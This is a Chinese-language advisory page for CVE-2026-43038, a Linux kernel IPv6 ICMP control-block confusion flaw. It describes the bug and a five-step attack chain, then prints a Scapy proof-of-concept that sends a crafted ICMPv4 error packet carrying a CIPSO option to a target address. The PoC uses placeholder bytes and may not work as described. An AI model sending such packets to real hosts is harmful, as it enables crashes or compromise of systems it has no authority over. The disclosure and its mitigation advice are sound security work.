CVE-2026-43038 CVSS 9.8 严重

CVE-2026-43038 Linux内核IPv6 ICMP缓冲区未清除漏洞

披露日期: 2026-05-01

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43038

漏洞类型

内存越界读写

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核在处理IPv6 ICMP错误消息时存在严重漏洞。在`ip6_err_gen_icmpv6_unreach()`函数中，克隆数据包时未清除控制块`cb[]`。攻击者可利用特制的IPv4 ICMP错误包中的CIPSO选项，导致IPv6控制块结构被错误解析，引发越界读写，可能导致系统崩溃或权限提升。

技术细节

该漏洞位于`net/ipv6/icmp.c`中的`ip6_err_gen_icmpv6_unreach()`函数。当内核处理IPv4 ICMP错误包并生成IPv6不可达消息时，克隆的SKB控制块（`cb[]`）未清零。原IPv4的`inet_skb_parm`结构被误认为IPv6的`inet6_skb_parm`。由于CIPSO选项偏移量与`dsthao`字段内存重叠，攻击者可构造恶意包设置该偏移量。随后`mip6_addr_swap()`利用此伪造偏移量调用`ipv6_find_tlv()`，在受控数据包中搜索TLV，导致读取伪造指针并执行超出边界的16字节内存交换操作，覆盖`skb_shared_info`结构。

攻击链分析

STEP 1

步骤1: 构造恶意数据包

攻击者构造一个特制的IPv4 ICMP错误数据包，其中包含一个精心设计的CIPSO IP选项。该选项的目的是在内存中设置特定的偏移量，该偏移量与IPv6控制块中的`dsthao`字段重叠。

STEP 2

步骤2: 发送并触发处理

将恶意数据包发送给目标Linux主机。目标内核接收数据包后，调用`ip6_err_gen_icmpv6_unreach()`函数以生成IPv6不可达响应。

STEP 3

步骤3: 控制块混淆

内核克隆SKB（Socket Buffer）时未清除`cb[]`区域。旧的IPv4 `inet_skb_parm`数据被残留，导致`icmp6_send()`误将IPv4选项偏移量当作IPv6的`dsthao`偏移量使用。

STEP 4

步骤4: 越界内存访问

`mip6_addr_swap()`函数利用伪造的偏移量调用`ipv6_find_tlv()`，在攻击者控制的IPv6数据包中查找TLV。由于偏移量无效，可能导致读取伪造的地址，并执行超出数据包末尾的16字节交换操作。

STEP 5

步骤5: 利用后果

越界写入可能破坏`skb_shared_info`或其他内核数据结构，导致内核崩溃（DoS）或在特定条件下实现权限提升（RCE）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

from scapy.all import *

# Proof of Concept for CVE-2026-43038
# This script attempts to trigger the vulnerability by sending
# a crafted ICMPv4 error packet containing a CIPSO option.

# Target IP address
target_ip = "192.168.1.100"

# Construct the inner IPv6 packet (controlled by attacker)
inner_ipv6 = IPv6(src="2001:db8::dead", dst="2001:db8::beef")
inner_payload = ICMPv6EchoRequest()

# Construct the outer IPv4 ICMP Unreachable packet
# We include a CIPSO option to manipulate the control block (cb)
# The specific byte alignment is required to overwrite dsthao offset
ip_header = IP(dst=target_ip, options=[IPOption_CIPSO(b'\x00\x00\x00\x00')])
icmp_header = ICMP(type=3, code=0) # Dest Unreachable

# Send the packet
# Note: This requires the target to be vulnerable and process ICMP errors
packet = ip_header / icmp_header / inner_ipv6 / inner_payload
send(packet)

print("[+] Malicious ICMPv4 packet sent to trigger skb->cb confusion.")

影响范围

Linux Kernel (Versions prior to commit 0452b6526b2f54b2413b9cb4ff1ea2ac542c99c7)

Linux Kernel (Versions prior to commit 1ceeebd5bd6d855b17a5df625109bfe29129d7cf)

Linux Kernel (Versions prior to commit 3d5127d998de617b130aae96b138dba22ac6a8a7)

防御指南

临时缓解措施

建议通过防火墙（如iptables或nftables）限制入站ICMPv4错误流量，特别是来自不可信网络的流量。在无法立即升级内核的情况下，禁用相关的IPv4/IPv6转换功能或ICMP错误生成机制可作为临时缓解手段。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表